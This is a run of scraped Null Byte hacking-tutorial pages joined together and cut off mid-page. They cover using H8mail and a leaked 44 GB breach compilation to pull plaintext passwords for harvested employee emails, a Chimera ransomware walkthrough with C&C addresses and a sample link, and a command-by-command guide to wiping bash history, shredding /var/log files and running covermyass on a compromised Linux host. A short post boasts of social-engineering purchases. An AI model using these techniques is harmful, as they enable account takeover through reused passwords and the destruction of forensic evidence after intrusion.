Passwordsβ€”For Beginners!How To:iOS 6 Broke Your Wi-Fi? Here's How to Fix Connection Problems on Your iPhone or iPadHow To:Having Connection Issues on Android Pie? Turn Off 'Turn on Wi-Fi Automatically'How To:Fix the Wi-Fi Roaming Bug on Your Samsung Galaxy S3How To:See Who's Using Your Wi-Fi & Boot Them Off with Your AndroidHow to Hack Wi-Fi:Cracking WPA2 Passwords Using the New PMKID Hashcat AttackHow To:Hack Wi-Fi & Networks More Easily with Lazy ScriptHow To:How Hackers Steal Your Internet & How to Defend Against ItHow To:Hack Anyone's Facebook, Twitter or YouTube Account with Your Android Device
How to Exploit Recycled Credentials with H8mail to Break into User Accounts Β« Null Byte :: WonderHowTo
Many online users worry about their accounts being breached by some master hacker, but the more likely scenario is falling victim to a bot written to use leaked passwords in data breaches from companies like LinkedIn, MySpace, and Tumblr. For instance, a tool called H8mail can search through over 1 billion leaked credentials to discover passwords that might still be in use today.How Your Password Ends Up in a Data BreachData breaches frequently make headlines, but it's often not apparent to the users impacted how this puts them at risk. Breaches are not all the same and can contain anything from credit reports to a simple email address. The information in a breach can also be stored in different ways, with the worst-case scenario being passwords stored incleartext.The most common alternative to cleartext is storing the information as plaintext in a more secure form like a hash. Unfortunately, a hash does not solve the problem, because many hashes themselves can be brute-forced. Password breaches involving passwords hashed with SHA-1 can still reveal plaintext passwords if they're common or easy-to-guess passwords.Hackers take advantage of these issues by buying and selling lists of stolen user details, with credit card numbers and passwords at the top of the list. Over time, many of the most-traded lists become publicly known.Don't Miss:Use Leaked Password Databases to Create Brute-Force WordlistsIn one instance, a colossal aggregate file called the "Breach Compilatio" was discovered to hold 1.4 billion credentials from various company data breaches. Once leaked to the internet, its aggregated credentials database provided the foundation for widescreen exploitation of accounts belonging to the accounts of users who reuse passwords between accounts.Attacking Recycled Credentials with H8mailH8mail is a tool for finding plaintext passwords from this massive data breach using only a person's email. This is most useful when combined with OSINT tactics like finding all the email addresses in an organization using tools likeTheHarvester, then feeding the resulting list into H8mail. I found this to be extremely effective at finding plaintext passwords for at least one person in a large organization, and the passwords tended to be terrible.Don't Miss:Scrape Target Email Addresses with TheHarvesterroot@nickles:~/h8mail# python3 h8mail.py -t [email protected] -bc '/media/root/R3DL34D3R/BreachCompilation' --local ._____. ._____. ;___________; | ._. | | ._. | ; h8mail.py ; | |_| |_|_|_| | ;-----------; |___| |_______| Heartfelt Email OSINT .___|_|_| |___. Use responsibly etc | ._____| |_. | ;____________________; | |_| | | |_| | ; github.com/khast3x ; |_____| |_____| ;--------------------; Targets ---------- => [email protected] Result [email protected] ----------------------------- => breached βœ“ --- Breaches found HIBP: 0 Breaches found breachcompilation: 12 Target hostname: gmail.com --- breachcompilation passwords: ssa123 123456789 18796-0em 1882564 3982262 6 6,91459E+11 asdf1234 jhedgeland kelly23 qwasqw12 rjyatnf777 ------------------------------- βœ“ DoneThe passwords stored in the database may be somewhat skewed towards bad passwords because data dumps with hashed passwords would likely still contain many passwords too strong to be easily brute-forced. Because of this, most of the email and password pairs extracted from hashed data breaches tend to be the absolute worst passwords.What You'll NeedTo use a tool like H8mail, we'll need the tool itself, and a data source. One perfectly acceptable way of using H8mail is to connect it to an API, but another is to download the entire breach compilation file and configure H8mail to search it locally.As I mentioned previously, the breach compilation database is 1.4 billion credentials organized into a list with no duplicated passwords and split into folders that make it easy and fast to search through. This database also forms the core of theHave I Been Pwneddatabase, although that service merely lets you know a breach has occurred on that email address and what the source of the breach is.Before we start, we'll need to have Python3 installed and be ready to install some prerequisites. I recommend usingKali Linux, and make sure to runapt getupdateto update your system before starting. If you don't, it could cause problems later in the installation.Step 1: Download H8mail & Data SourcesAfter navigating tothe GitHub repository, clone the repository with the following command.git clone https://github.com/khast3x/h8mail.gitYou'll need NodeJS installed for H8mail to work properly, so install it by typing the following in a terminal window.apt-get install nodejsNext, you'll need tochange the directoryto the one just downloaded, and then install the requirements with pip. I recommend using pip3, as pip3 did work for me while pip did not. To do so, type the following into a terminal window and wait for the requirements to finish installing.cd h8mail pip3 install -r requirements.txtOnce the prerequisites are taken care of, you can run h8mail.py to see the options available. From inside the h8mail folder downloaded, run the Python script with the following command, which will bring up the help menu. Here, you'll see the options available in H8mail.python3 ./h8mail.py -h python3 h8mail.py -h usage: h8mail.py -h -t TARGET_EMAILS -c CONFIG_FILE -o OUTPUT_FILE -bc BC_PATH -v -l -k CLI_APIKEYS Email information and password finding tool optional arguments: -h, --help show this help message and exit -t TARGET_EMAILS, --targets TARGET_EMAILS Either single email, or file (one email per line). REGEXP -c CONFIG_FILE, --config CONFIG_FILE Configuration file for API keys -o OUTPUT_FILE, --output OUTPUT_FILE File to write output -bc BC_PATH, --breachcomp BC_PATH Path to the breachcompilation Torrent. [https://ghostbin.com/paste/2cbdn ] -v, --verbose Show debug information -l, --local Run local actions only -k CLI_APIKEYS, --apikey CLI_APIKEYS Pass config options. Format is "K:V,K:V"Step 2: Use H8mail Against a Single EmailWe'll be using the local option, which means downloading the breach compilation for this demonstration. If you prefer to use the API option, you'll need to followthe instructions on GitHubfor adding the API keys for whatever service you wish to use.Downloading the breach compilation is relatively easy to do and only took one Google search and torrenting a 44 GB magnet file. I won't link to the file directly, but any hacker worth their salt can find the breach compilation available from public sources. Once you have the breach compilation file, a basic search can be conducted by using the following string.python3 h8mail.py -t [email protected] -bc 'location_of_your_file/BreachCompilation' --localThis calls Python3 to execute h8mail.py, with the arguments set for [email protected] the email for searching,bcfor breach compilation, and then the location of the breach compilation folder on your computer with--localat the end to denote that the files are saved locally. With this command, you can check any email address you want. If you get a hit, it looks like this:Targets ---------- => [email protected] Result [email protected] --------------------------- => breached βœ“ --- Breaches found HIBP: 0 Breaches found breachcompilation: 1 Target hostname: gmail.com --- breachcompilation passwords: handbanana tonight...you ------------------------------- βœ“ DoneStep 3: Search for Passwords from Groups of Email AccountsNow that you can search for individual accounts, let's combine what you've learned inpreviousguidesto search for all the emails you can find for an organization. For my example, I'm using priceline.com. First, we'lluse TheHarvesterto gather email addresses from the priceline.com domain.Don't Miss:Use the Buscador OSINT VM for Conducting Online InvestigationsFor whatever reason, a sizable number of Priceline employees use PGP, so running TheHarvester against the PGP keyserver gave me enough email addresses to create a sizable list of company email addresses.theharvester -d priceline.com -l 1000 -b pgpAfter copying the list that is returned, you can create a target file by typing the following and then pasting the found emails into the text editor that opens.nano targets.txtOnce you've done this, typeCtrl-Xand selectYto save your changes, then you can run H8mail against all the emails in your target list at once. To do so, use the following command.python3 h8mail.py -t '/root/h8mail/targets.txt' -bc '~/BreachCompilation' --localThe command may take some time to complete. When it's done, you're likely to find at least some breached passwords from the list of employee emails. Stunningly, we didn't find any from the Priceline list, but if I did, I probably wouldn't be able to publish the results anyway.These examples are just the start of what you can do with H8mail, and you can use your imagination to think of how being able to search for passwords belonging to long lists of people's email addresses might be useful.Password Recycling Is the Biggest Threat to the Average UserNow that we've demonstrated how easy it is to use a list of organizational email addresses to search for password breaches, it's easy to see how important it is not to reuse passwords between websites. The biggest cause for concern is that some of your online accounts may use the same old passwords that have been breached already, opening you up to the risk of bots armed with your email address and an old password taking control of your online accounts.Don't Miss:Use Google's Advanced Protection Program for Extra SecurityThe best way to protect against this vulnerability is touse strong, unique passwordsfor each website. This also means not using patterns that are predictable, because often there are multiple breached passwords for a single email address, meaning a hacker will know if there is an obvious pattern to your passwords.Password managers likeLastPasscan help create and store strong passwords, and the ultimate way of defending against these attacks istwo-factor authentication, preferablywith a hardware key. By using aFIDO security key, any device wanting to log into your account and knowing your password will still need the physical key to log in, making the password the attacker has much less useful.You canset up two-factor authenticationon most online accounts, and I highly recommend doing so if you've been guilty of the bad habit of reusing passwords. Between two-factor authentication and using password managers to maintain and remember strong, unique passwords, the average user can reduce their risk substantially against this kind of attack.I hope you enjoyed this guide to using H8mail to find breached passwords belonging to a targeted email! If you have any questions about this tutorial on H8mail or you have a comment, feel free to reach me in the comments below or on [email protected] on Amazon:Feitian MultiPass FIDO Security KeyFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image by Kody/Null ByteRelatedHack Like a Pro:Metasploit for the Aspiring Hacker, Part 8 (Setting Up a Fake SMB Server to Capture Domain Passwords)How To:Extract Windows Usernames, Passwords, Wi-Fi Keys & Other User Credentials with LaZagneHow To:Protect Yourself from the Biggest Jailbreak Hack in HistoryHow To:Steal Usernames & Passwords Stored in Firefox on Windows 10 Using a USB Rubber DuckyHow To:Set Up Multiple User Profiles on Your Galaxy S5β€”Or Any Other Android PhoneHow To:Add & Use More Accounts on Instagram for Easy Profile SwitchingNews:How Spammers Can Steal Your Personal Info from SnapchatHow To:Delete Your Bumble Account (Or Snooze It)Hack Like a Pro:Remotely Add a New User Account to a Windows Server 2003 BoxHow To:Hack a Hard Drive into a Hidden Flash Drive, Cell Phone Charger & More!How to Meterpreter:Obtaining User Credentials with PowerShellHacking Windows 10:How to Steal & Decrypt Passwords Stored in Chrome & Firefox RemotelyHow To:Hack WPA/WPA2-Enterprise Part 1How To:You Can Easily Hack Instagram for a Crazy Amount of Likes (But You Totally Shouldn't)News:Encryption Is Not Enough !, Research & Conclusion (Part 1)How To:Manage Stored Passwords So You Don't Get HackedNews:Flaw in Facebook & Google Allows Phishing, Spam & MoreSocial Engineering, Part 2:Hacking a Friend's Facebook PasswordHow To:Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator ExploitHow To:Unban Your Xbox LIVE Account That is Banned Until 12/31/9999 by Tricking Microsoft's Banning SystemHow To:Get Free Netflix for LifeGoodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingNews:Mark and Joe Build a Spaceship - Ultra Recycling!Community Byte:HackThisSite Walkthrough, Part 3 - Legal Hacker TrainingHow To:Hack Mac OS X Lion PasswordsMastering Security, Part 1:How to Manage and Create Strong PasswordsForbes Exploited:XSS Vulnerabilities Allow Phishers to Hijack Sessions & Steal LoginsNews:Advanced Cracking Techniques, Part 1: Custom DictionariesHow To:Remove a Windows Password with a Linux Live CDNews:Recycle from ClothingNews:Recycle books as plantersNews:Remote Chrome Password StealerRoot Exploit:Memodipper Gets You Root Access to Systems Running Linux Kernel 2.6.39+Goodnight Byte:HackThisSite Walkthrough, Part 7 - Legal HackerNews:Eco Friendly Window TreatmentsNews:Recycled BrideNews:Update Facebook from Google+ without an extensionHow To:Is Your Website Vulnerable to XSS Injections? Here's How to Protect Your VisitorsCommunity Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker Training
The Hacks of Mr. Robot: How Elliot & Fsociety Destroyed Evil Corp's Data Β« Null Byte :: WonderHowTo
Welcome back, my nascent hackers!Inthe conclusionof theMr. Robottelevision series, Elliot and fsociety successfully completed their mission of encrypting all of Evil Corp's data with AES-128 encryption and destroying the key.Now that all of the data on Evil Corp's servers (including 70% of the world's consumer debt and student loans) has been successfully destroyed, let's examine how they did it, or rather... how theymighthave done it. Since the show is a bit vague on details, let's examine a similar attack that has recently surfaced in Europe.A Quick Review of How It Played OutWe know that Elliot and fsociety had destroyed all of the back-up tapes held by Steel Mountain when theyhacked the HVAC system with a Raspberry Pi, which they used to turn up the temperature in the storage facility high enough to render the backups unusable.With the tapes unusable, Elliot had to then destroy the data on Evil Corp's serverswithout being traced. As you know by now,deleting the files on the servers will not remove the data. Elliot and his colleagues knew this too, so they decided to encrypt the data with AES instead. In this way, the data was still there, but indecipherable to Evil Corp.Using Chimera as an ExampleRecently, a new type ofransomwarewas found in Germany calledChimera. It has been used to attack businesses in Germany, rather than consumers as much of the previous ransomware targeted. Since most ransomware works similarly, let's use it as a model for how Elliot and fsociety may have "destroyed," or rendered useless, the data on Evil Corp's hard drives.In this analysis, I will summarize how Chimera works, leaving out some steps for the sake of brevity. If you would like a copy of Chimera to conduct your own detailed analysis, I haveposted it on Pastebin here.Step 1: Delivering the MalwareLike much of the ransomware that has appeared in recent years, Chimera was delivered by email, likely with a social engineering component to get someone to click on a link or a file. It was written in .NET.In this first stage, Chimera initially delivers an executable stub, whose only job is to call, decrypt, and decode the second stage payload, to the victim.Step 2: The AES AlgorithmThe second stage is the encrypted and encoded payload that contains a method that is clearly an AES encryption algorithm. Elliot and his colleagues would have used this or something very similar to encrypt Evil Corp's data. Likely, that would have it run in multiple threads to speed up the process. Considering the fact that Evil Corp likely has petabytes of data, encrypting it all would take some time.Step 3: Mapping to MemoryIn the next stage, Chimera then manually maps its processes to memory. This is very likely to bypassASLR and DEPprotections that are built into Windows and other operating systems. These protections randomize where a process will likely be in memory, making it more difficult to implement abuffer overflowas the malware cannot predict the location of the pointer. By manually mapping the process to memory, it makes it more likely that the malware will function as expected.Step 4: Find 32-Bit Process to HostNext, Chimera goes througheveryWindows process looking for a 32-bit process that can host its payload and then open it.Step 5: Finding the Local IPNext, this ransomware goes out and finds the public IP of the machine it has infected by usingwhatismyipaddress.com. It then stores that value in a variable.Step 6: Call Back to Command & Control ServersOnce Chimera has the IP of the infected host, it then calls out to its command and control (C&C) servers. In this case, those servers are at 95.165.168.168 and 158.222.211.81.Chimera usesBitmessageto communicate via a P2P protocol on ports 8444 and 8080. Bitmessage is a secure, encrypted P2P messaging system that enables a single person to send out messages to one or many recipients. You can see in the screenshot below that Chimera calls the Bitmessage client PyBitmessage.Step 7: Browse & Find Hard Drives, Then FilesNext, the malware must find the hard drives where the data is stored. It needs to browse each of the logical drives and then store these locations into a variable for later use in the encryption process.Step 8: Get Random KeyNow that Chimera has successfully taken over a 32-bit process, mapped itself to memory to avoid ASLR, and enumerated the hard drives, it needs to call back to its command and control server to get a random key with which to encrypt the files.Once the random key has been obtained from the command and control server, Chimera calls the function from Step #2 aboveβ€”the AES encryption algorithmβ€”and begins to encrypt critical files.Before it starts the encryption, it looks for the following file types:.jpg, .jpeg, .xml, .xsl, .wps, .cmf, .vbs, .accdb, .ini, .cdr, .svg, .conf, .config, .wb2, .msg, .azw, .azw1, .azw3, .azw4, .lit, .apnx, .mobi, .p12, .p7b, .p7c, .pfx, .pem, .cer, .key, .der, .mdb, .htm, .html, .class, .java, .asp, .aspx, .cgi, .php, .jsp, .bak, .dat, .pst, .eml, .xps, .sqllite, .sql, .jar, .wpd, .crt, .csv, .prf, .cnf, .indd, .number, .pages, .x3f, .srw, .pef, .raf, .rf, .nrw, .nef, .mrw, .mef, .kdc, .dcr, .crw, .eip, .fff, .iiq, .k25, .crwl, .bay, .sr2, .ari, .srf, .arw, .cr2, .raw, .rwl, .rw2, .r3d, .3fr, .eps, .pdd, .dng, .dxf, .dwg, .psd, .png, .jpe, .bmp, .gif, .tiff, .gfx, .jge, .tga, .jfif, .emf, .3dm, .3ds, .max, .obj, .a2c, .dds, .pspimage, .yuv, .3g2, .3gp, .asf, .asx, .mpg, .mpeg, .avi, .mov, .flv, .wma, .wmv, .ogg, .swf, .ptx, .ape, .aif, .av, .ram, .m3u, .movie, .mp1, .mp2, .mp3, .mp4, .mp4v, .mpa, .mpe, .mpv2, .rpf, .vlc, .m4a, .aac, .aa3, .amr, .mkv, .dvd, .mts, .vob, .3ga, .m4v, .srt, .aepx, .camproj, .dash, .zip, .rar, .gzip, ., mdk, .mdf, .iso, .bin, .cue, .dbf, .erf, .dmg, .toast, .vcd, .ccd, .disc, .nrg, .nri, .cdiThese file types are likely critical to the business operation. These are graphics files, spreadsheet files, database files, backup files, email files, Java files, audio files, movie files, and encryption keys. Without them, the business is crippled.Step 9: Ransom RequestFinally, Chimera makes a ransom request to the business owner. Note that the browser and its associated files are exempt from the encryption to enable the browser request and receive the payment of the ransom.I want to thank the folks at ReaQTA in Valleta, Malta forfinding, disassembling, and analyzing this malware(and for the screenshots).Keep coming back, my nascent hackers, as we continue toexplore the hacks of Mr. Robot, including an upcoming guide on how I would catch Elliot!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image via USA NetworksRelatedNews:Samy's MagSpoof Hacking Device Was Just Featured on Mr. RobotThe Hacks of Mr. Robot:How Elliot & Fsociety Made Their Hack of Evil Corp UntraceableThe Hacks of Mr. Robot:How to Build a Hacking Raspberry PiThe Hacks of Mr. Robot:How to Hide Data in Audio FilesThe Hacks of Mr. Robot:How to Hack BluetoothThe Hacks of Mr. Robot:How to Send a Spoofed SMS Text MessageNews:Emotion-Sensing Robot Ready to Love?How To:Hack Your Resume to Fool Keyword-Hunting Robots & Land Yourself More Interviews (The Evil Way)How To:Learn How Elliot from Mr. Robot Hacked into His Therapist's New Boyfriend's Email & Bank Accounts (Using Metasploit)News:A Game of Real HackingMarket Reality:Perfect Corp. & EchoPixel Close Series A Rounds on Interactive AppsThe Hacks of Mr. Robot:How to Send Ultra-Secure EmailsNews:Your Bose Headphones Are Spying on YouNews:ProntonMail under DDoS AttackThe Hacks of Mr. Robot:How to Use the Shodan API with Python to Automate Scans for Vulnerable DevicesMr. Robot:Hacking Sequence ExplainedNews:Valero Energy Corp.News:Lego Seek and Destroy TankHow To:9 Ways to Get People to Do What You WantNews:Learn to Code in Python, Part One: Variables, Input and OutputArduino Air Force:DIY Robotic Cardboard QuadcoptersResident Evil:AfterlifeNews:Save Me!News:SHOT Show 2012 DoubleStar Corp Zombie-X AK with Chain SawNews:Corp Watch ArticleNews:Vibrant Color Photography Challenge: Evil Gummy Bear
Clear the Logs & Bash History on Hacked Linux Systems to Cover Your Tracks & Remain Undetected Β« Null Byte :: WonderHowTo
As a hacker, the final stage of exploitation is covering their tracks, which involves wiping all activity and logs so that they can avoid being detected. It's especially crucial for persistence if the target will be accessed again in the future by the attacker.To show you the basics of covering your tracks, we'll compromise a target first, then explore some techniques used to delete Bash history, clear logs, and remain hidden after exploiting a Linux system. You can check out ourCyber Weapons Labvideo below that outlines my guide or skip below to get right to the written steps.Step 1: Compromise a TargetThe first thing we need to do is exploit the target. We can usecommand injectionto abuse the way the server handlesOS commandsto get a shell. We'll also want toupgrade our new shellto a fully interactive one. Doing so will make it easier to work in general, and it will also let us use tab completion and terminal history.Don't Miss:Use Websploit to Scan Websites for Hidden DirectoriesAfter that, we canescalate our privilegesto root so we can better take advantage of the system to remain undetected.Step 2: Create an Easy-to-Delete Hidden DirectoryOnce we have root access, we can create ahidden directoryto work out of and keep any scripts or files in. It won't fool anyone but the most noobie admin, but another layer of discretion certainly couldn't hurt. First, let's locate any writable directories with the following command:root@target:/# find / -perm -222 -type d 2>/dev/null /dev/shm /var/lock /var/lib/php5 /var/tmp /var/www/dav /var/www/twiki/data/Sandbox /var/www/twiki/data/Main /var/www/twiki/data/Know /var/www/twiki/data/TWiki /var/www/twiki/data/_default /var/www/twiki/data/Trash /var/www/twiki/pub/Sandbox /var/www/twiki/pub/Main /var/www/twiki/pub/Know /var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL /var/www/twiki/pub/TWiki /var/www/twiki/pub/TWiki/TWikiDocGraphics /var/www/twiki/pub/TWiki/TWikiTemplates /var/www/twiki/pub/TWiki/TWikiLogos /var/www/twiki/pub/TWiki/PreviewBackground /var/www/twiki/pub/TWiki/FileAttachment /var/www/twiki/pub/TWiki/WabiSabi /var/www/twiki/pub/Trash /var/www/twiki/pub/icn /tmp /tmp/.ICE-unix /tmp/.X11-unixWe can create a hidden directory with themkdircommand and by prepending the name with a dot:root@target:/# mkdir /dev/shm/.secretIf we list the contents of /dev/shm now, nothing shows up:root@target:/# ls -l /dev/shm/ total 0Only when we use the-aswitch to list all files and directories does it show up:root@target:/# ls -la /dev/shm/ total 0 drwxrwxrwt 3 root root 60 2019-06-19 13:49 . drwxr-xr-x 13 root root 13480 2019-06-19 13:41 .. drwxr-xr-x 2 root root 40 2019-06-19 13:49 .secretAnd to remove the directory once we are finished on the machine, use thermdircommand:root@target:/# rmdir /dev/shm/.secret/Step 3: Delete the Bash HistoryBashkeeps a list of commands used in the current session in memory, so it's important to clear it to cover your tracks. We can view the current history with thehistorycommand:root@target:/# history 1 cd / 2 ls 3 find / -perm -222 -type d 2>/dev/null 4 cd /dev/shm/ 5 cd / 6 mkdir /dev/shm/.secret 7 ls -l /dev/shm/ 8 ls -la /dev/shm/ 9 ls 10 rmdir /dev/shm/.secret/ 11 historyCommands are written to the HISTFILE environment variable, which is usually .bash_history. We canechoit to see the location:root@target:/# echo $HISTFILE /root/.bash_historyWe can use theunsetcommand to remove the variable:root@target:/# unset HISTFILESo when we echo it again, nothing shows up:root@target:/# echo $HISTFILEWe can also make sure the command history isn't stored by sending it to /dev/null. Set the variable to it:root@target:/# HISTFILE=/dev/nullOr do the same with the export command:root@target:/# export HISTFILE=/dev/nullAnd the history will now be sent to /dev/null (nowhere):root@target:/# echo $HISTFILE /dev/nullWe can set the number of commands to be stored during the current session to 0 using the HISTSIZE variable:root@target:/# HISTSIZE=0Alternatively, use the export command:root@target:/# export HISTSIZE=0We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Set this to 0:root@target:/# HISTFILESIZE=0Or with export:root@target:/# export HISTFILESIZE=0Thesetcommand can be used to changeshelloptions as well. To disable the history option, use the following command:root@target:/# set +o historyAnd to enable it again:root@target:/# set -o historySimilarly, theshoptcommand can be used to change shell options. To disable history, use the following command:root@target:/# shopt -ou historyAnd to enable it again:root@target:/# shopt -os historyWhile running commands on the target system, we can sometimes avoid saving them to history by starting the command with a leading space:root@target:~# cat /etc/passwdThat technique doesn't work all the time and depends on the system.We can also just clear the history using the-cswitch:root@target:~# history -cTo make sure the changes are written to disk, use the-wswitch:root@target:~# history -wThat will only clear the history for the current session. To absolutely make sure the history is cleared when exiting a session, the following command comes in handy:root@target:/# cat /dev/null > ~/.bash_history && history -c && exitWe can also use thekillcommand to exit the session without saving history:root@target:/# kill -9 $$Step 4: Clear the Log FilesIn addition to Bash history,log filesalso need to be wiped to remain undetected. Here are some common log files and what they contain:/var/log/auth.log Authentication/var/log/cron.log Cron Jobs/var/log/maillog Mail/var/log/httpd ApacheOf course, we can simply remove a log with thermcommand:root@target:/# rm /var/log/auth.logBut that will likely raise red flags, so it's better to empty the file rather than erase it completely. We can use thetruncatecommand to shrink the size to 0:root@target:/# truncate -s 0 /var/log/auth.logPlease note, truncate is not always present on all systems.We can accomplish the same thing by echoing nothing into the file:root@target:/# echo '' > /var/log/auth.logAnd also with>by itself to empty the file:root@target:/# > /var/log/auth.logWe can also send it to /dev/null:root@target:/# cat /dev/null > /var/log/auth.logOr use theteecommand:root@target:/# true | tee /var/log/auth.logWe can also use theddcommand to write nothing to the log file:root@target:/# dd if=/dev/null of=/var/log/auth.log 0+0 records in 0+0 records out 0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/sTheshredcommand can be used to overwrite a file with meaningless binary data:root@target:/# shred /var/log/auth.logWe can even tack on-zuwhich will truncate the file and overwrite it with zeros to hide evidence of shredding:root@target:/# shred -zu /var/log/auth.logStep 5: Use a Tool to Ensure Things Are ErasedTo increase the chances that any activity on the target goes undiscovered, we can use a tool to make sure everything gets erased.Covermyassis a script that will automate much of the processes we've already covered, including clearing log files and disabling Bash history.We can grab the script from GitHub usingwget(assuming we have access to the internet on the target, otherwise, it will have to be transferred manually):root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyassHead to a writable directory, and usechmodto make it executable:root@target:/tmp# chmod +x covermyassThen we can run it:root@target:/tmp# ./covermyass Welcome to Cover my ass tool ! Select an option : 1) Clear logs for user root 2) Permenently disable auth & bash history 3) Restore settings to default 99) Exit tool >We're given a custom prompt with a few options to choose from. Let's select the first one to clear the logs:> 1 [+] /var/log/messages cleaned. [+] /var/log/auth.log cleaned. [+] /var/log/kern.log cleaned. [+] /var/log/wtmp cleaned. [+] ~/.bash_history cleaned. [+] History file deleted. Reminder: your need to reload the session to see effects. Type exit to do so.We can also disable Bash and auth history with option 2:> 2 [+] Permanently sending /var/log/auth.log to /dev/null [+] Permanently sending bash_history to /dev/null [+] Set HISTFILESIZE & HISTSIZE to 0 [+] Disabled history library Permenently disabled bash log.And in case you need to clear everything in a hurry, simply appendnowto the command:root@target:/tmp# ./covermyass now [+] /var/log/messages cleaned. [+] /var/log/kern.log cleaned. [+] /var/log/wtmp cleaned. [+] ~/.bash_history cleaned. [+] History file deleted. Reminder: your need to reload the session to see effects. Type exit to do so.Wrapping UpToday, we explored various techniques used to cover tracks and remain undetected on a compromised machine. We covered ways to disable and delete Bash history, methods to clear log files, and utilized the Covermyass tool to ensure our activity on the target was wiped. There are other ways to clear certain traces of an attack, likeusing Metasploit,using shell scripting, or doing iton a hacked Windows machine, but the above should be everything you need for a basic Linux computer.Don't Miss:How Hackers Cover Their Tracks on an Exploited Linux Server with Shell ScriptingWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image byVojtech Okenka/PexelsRelatedHack Like a Pro:How to Cover Your Tracks & Leave No Trace Behind on the Target SystemFacebook 101:How to View, Delete & Disable Location History Data That's Been Collected on YouHow To:Catch USB Rubber Duckies on Your Computer with USBRipNews:Even Microsoft Acknowledges the Superiority of the Bash Shell NowHack Like a Pro:How to Cover Your Tracks So You Aren't DetectedHow To:Turn Off Facebook Lite's Call & Text History Logging on AndroidHow To:See the Notifications You Cleared by AccidentYouTube 101:How to Manage Your Search History & Clear Watched VideosAndroid Basics:How to View Your Location HistoryHow To:Store All Incoming Snapchat Photos on Your iPhone Without Notifying the SendersHow to Hack Like a Pro:Getting Started with MetasploitHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)How To:Undo a Thumbs-Down Rating for a Song You've Grown to Like on PandoraGmail 101:How to Clear Search History on Android or iOSMac Troubleshooting:How to Find Your Restart, Shutdown & Uptime HistoryBinance 101:How to View Your Transaction HistoryHack Like a Pro:How to Hack the Shellshock VulnerabilityHow To:The Five Phases of HackingHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 23 (Logging)How To:Every Mac Is Vulnerable to the Shellshock Bash Exploit: Here's How to Patch OS XHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 22 (Samba)Safari 101:How to Clear Your Recently Closed Tabs ListHow To:Bypass Android's Call Log Limits to Keep an Unlimited Call HistoryHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 9 (Managing Environmental Variables)How To:Bypass Antivirus Software by Obfuscating Your Payloads with GraffitiNews:Safari to Block Third-Party Tracking & AutoplayHow To:Hide Your Call & Message History for Specific Phone Numbers Using Reflection for AndroidHow To:Create a Persistent Back Door in Android Using Kali Linux:Hack Like a Pro:How to Conduct Active Reconnaissance and DOS Attacks with NmapHow To:An Entry Level Guide to Finding and Reading Logs (And Maybe Staying Out of Jail)Hack Like a Pro:Hacking Samba on Ubuntu and Installing the MeterpreterHow To:Prevent Social Networks from Tracking Your Internet ActivitiesHow To:Use Google's New Privacy Tools to Stop Them from Tracking YouHack Logs and Linux Commands:What's Going On Here?News:Change from BASH to zshNews:Performance Hacks & Tweaks for LinuxHow To:Chain Proxies to Mask Your IP Address and Remain Anonymous on the WebNews:Complete Arch Linux Installation, Part 1: Install & Configure Arch
Proof of Social Engineering Success! Β« Null Byte :: WonderHowTo
Just showing off the successful social engineering results. Make sure that if you usedthe guide, post back here with a picture of whatever you bought!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Learn the Secrets of PsychologyHack Like a Pro:How to Spear Phish with the Social Engineering Toolkit (SET) in BackTrackSocial Engineering:How to Use Persuasion to Compromise a Human TargetHack Like a Pro:The Ultimate Social Engineering HackHow To:Use "SET", the Social-Engineer ToolkitHow To:Use Social Engineering to Hack ComputersHow To:Antisocial EngineNews:Detailed 3D Mining Maps & Future Reclamation Views Highlighted in Proof-of-Concept HoloLens AppSocial Engineering:The Most Powerful HackHow To:Social Engineering - Total GuideHow To:Use Social Engineering to Find Out More Information About a CompanyListen In:Live Social Engineering Phone Calls with Professional Social Engineers (Week 2)News:Sims Social Cheat Engine - Video ProofListen In:Live Social Engineering Phone Calls with Professional Social Engineers (Final Session)Listen In:Live Social Engineering Phone Calls with Professional Social EngineersNews:Live Social EngineeringSocial Engineering, Part 1:Scoring a Free Cell PhoneWeekend Homework:How to Become a Null Byte Contributor (2/17/2012)How To:Advanced Social Engineering, Part 1: Exact Revenge on Craigslist Scammers with Tabnab PhishingHow To:Social Engineer Your Way Into an Amusement Park for FreeSocial Engineering, Part 